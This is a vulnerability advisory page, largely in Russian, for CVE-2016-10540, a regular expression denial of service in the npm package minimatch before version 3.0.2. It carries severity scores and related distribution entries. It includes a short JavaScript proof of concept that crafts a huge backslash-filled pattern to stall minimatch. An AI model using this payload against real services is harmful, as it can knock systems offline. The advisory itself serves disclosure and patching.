GHSA-hxm2-r34f-qmc5

Опубликовано: 09 окт. 2018

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

Regular Expression Denial of Service in minimatch

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

var minimatch = require(“minimatch”); // utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; } var exploit = “[!” + genstr(1000000, “\\”) + “A”; // minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”);

Recommendation

Update to version 3.0.2 or later.

Ссылки

Пакеты

Наименование

minimatch

npm

Затронутые версииВерсия исправления

< 3.0.2

3.0.2

EPSS

Процентиль: 62%

0.00435

Низкий

7.5 High

CVSS3

CVE ID

CVE-2016-10540

Дефекты

CWE-400

Связанные уязвимости

CVE-2016-10540

CVSS3: 7.5

ubuntu

больше 7 лет назад

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path, pattern)` in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the `pattern` parameter.

CVE-2016-10540

CVSS3: 7.5

nvd

больше 7 лет назад

CVE-2016-10540

CVSS3: 7.5

debian

больше 7 лет назад

Minimatch is a minimal matching utility that works by converting glob ...

EPSS

Процентиль: 62%

0.00435

Низкий

7.5 High

CVSS3

CVE ID

CVE-2016-10540

Дефекты

CWE-400